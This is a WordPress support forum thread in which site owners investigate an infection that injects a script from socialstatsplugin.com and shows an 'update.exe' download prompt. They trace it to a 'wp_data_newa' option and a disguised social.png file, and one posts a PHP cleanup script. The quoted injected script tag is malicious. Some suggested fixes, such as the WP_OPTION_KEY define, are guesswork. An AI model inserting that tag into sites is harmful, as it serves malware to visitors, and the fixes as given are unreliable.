download update.exe?

That’s doesn’t sound good. That link clearly shows that download but I can’t locate where that script is in the plugin source.

How did you locate that line?

Generally for plugin issues like this can you report them to plugins [at] www.ads-software.com but if you can explain how you got that line it would/may make life easier.

It appears that the following line is coming up at the end of wp_head():
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script><script src="//socialstatsplugin.com/jqury.js"></script><meta property="og:site_name" content="The Tab Aberystwyth" />

It’s currently only showing on one of our sites (wp 3.9.1 multisite) aberystwyth.tab.co.uk but need to make sure still.

Thought I had gotten rid of it but it’s come back now. I need to further investigate where it’s coming from.

Will update

Hi My site also have that pop-up which leading to the socialstatsplugin.com. Is this a bug or what? hoping for the resolution for it.

Hi Marius,

I was able to remove it by re-installing the wordpress.
Try to go to your dashboard update then re-install Worpress.

Thanks! Let me know if it will work

I was able to remove it by re-installing the wordpress.
Try to go to your dashboard update then re-install Worpress.

It’s currently only showing on one of our sites (wp 3.9.1 multisite) aberystwyth.tab.co.uk but need to make sure still.

Thought I had gotten rid of it but it’s come back now. I need to further investigate where it’s coming from.

That’s very not good. :X I’ve sent an email to the plugins [at] www.ads-software.com with the link to this topic.

Thanks, ill update you if the error will re occur again after what ive done

I’ve made some progress by identifying where this is initiated. In your wp_options (or wp_ID_options on multisite) there’s a row / option called ‘wp_data_newa’. Will investigate further to see who’s responsible for this but for now you can (temporarily!) fix it by removing it with an SQL statement:
DELETE FROMwp_optionsWHEREoption_namelike '%wp_data_newa%'

Additionally, if you have a big multi site, you may run a PHP script like this one:

<?php
/**
 * @author Marius Cucuruz
 * @description Fixes the "socialstats" download message by deleting lines WHERE <code>option_name</code> = 'wp_data_newa'
 * @copyright The tab Media, 2014
 */

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp/wp-blog-header.php' );

global $wpdb;

$blogs_details = $wpdb->get_results('SELECT <code>blog_id</code>, <code>domain</code> FROM <code>wp_blogs</code> ORDER BY <code>wp_blogs</code>.<code>blog_id</code> ASC', ARRAY_A);
foreach ($blogs_details as $blogDetails)
{
    if ($blogDetails['blog_id'] == 1)
    {
        echo "<br />Checking ". $blogDetails['domain'] ." (#". $blogDetails['blog_id'] ."):<br />";
        $socialstatsFixFind = "SELECT * FROM <code>wp_options</code> WHERE <code>option_name</code> like '%wp_data_newa%'";
        if ($wpdb->query($socialstatsFixFind)) {
                echo "Darn! Found entry here... ";
                $socialstatsFixRemove = "DELETE FROM <code>wp_options</code> WHERE <code>option_name</code> like '%wp_data_newa%'";

                if ($wpdb->query($socialstatsFixRemove)) {
                    echo "<strong style='color: green;'>Successfully fixed!</strong><br />";
                } else {
                    echo "<strong style='color: red;'>SHIT!<br />ERROR</strong>: ". mysql_error() ."<br />";
                }
        } else {
            echo "<strong style='color: green;'>". $blogDetails['domain'] ." is clean!</strong><br />";
        }
    }
    else
    {
        echo "<br />Checking ". $blogDetails['domain'] ." (#". $blogDetails['blog_id'] ."):<br />";
        $socialstatsFixFind = "SELECT * FROM <code>wp_&quot;. $blogDetails['blog_id'] .&quot;_options</code> WHERE <code>option_name</code> like '%wp_data_newa%'";
        if ($wpdb->query($socialstatsFixFind)) {
                echo "Darn! Found entry here... ";
                $socialstatsFixRemove = "DELETE FROM <code>wp_&quot;. $blogDetails['blog_id'] .&quot;_options</code> WHERE <code>option_name</code> like '%wp_data_newa%'";
                if ($wpdb->query($socialstatsFixRemove)) {
                    echo "<strong style='color: green;'>Successfully fixed!</strong><br />";
                } else {
                    echo "<strong style='color: red;'>SHIT!<br />ERROR</strong>: ". mysql_error() ."<br />";
                }
        } else {
            echo "<strong style='color: green;'>". $blogDetails['domain'] ." is clean!</strong><br />";
        }
    }
}
?>

Looks like the malicious code resides in wp-content/plugins/wordpress-simple-survey/images/social.png so the guilty one here is actually WP Simple Survey.

Haven’t yet had a look to see what that code actually does but initaily I saw some hosts and email addresses so I reckon password changing might be a good idea.
If anyone else can investigate this further I am curious to hear your thoughts.

Also as a precaution I’ve added the following line in my wp-config.php file:
define( 'WP_OPTION_KEY', '');
I think this will prevent this code from running in the future.

Marius, there’s no /images/ folder in wordpress-simple-survey.

I think you were hacked and someone left that as a backdoor.

If i delete my website. then make a new. does this bug/virus be remove?

Hi All,
Thanks for all valuable suggestions.
i Have done some reviews for this kind of virus.

Just go to your WP folder and check if any unwanted hidden file and when you browse through that , the files are unreadable.

As marius said Just do DELETE FROM wp_options WHERE option_name like '%wp_data_newa%' and

delete all unwanted hidden folder within any folder.

It worked till now. Hope it will help. Never knows the future.

Thanks

Hi TheAjit,

May i know the specific folder? is it like under ( wp-content, etc?)

Thanks!

jyfranco,

Check all folders. Specially main root folder of WP

Hey Franco,
Please check to see if you too have the ./wp-content/plugins/wordpress-simple-survey/images/social.png file. Would sort of reassuring nice to see we all have the same symptoms… If you do find that image, delete it and then run that PHP script I posted yesterday.
Good luck

This started happening today on a site ive been working on. i disabled all my plugins(WP Simple Survey wasnt one of them btw) but it was still showing up. So I changed my theme(im using a childtheme with the parent being vantage), and so far so good. the only change i can think of was a update to vantage. Not sure though. thought this might help.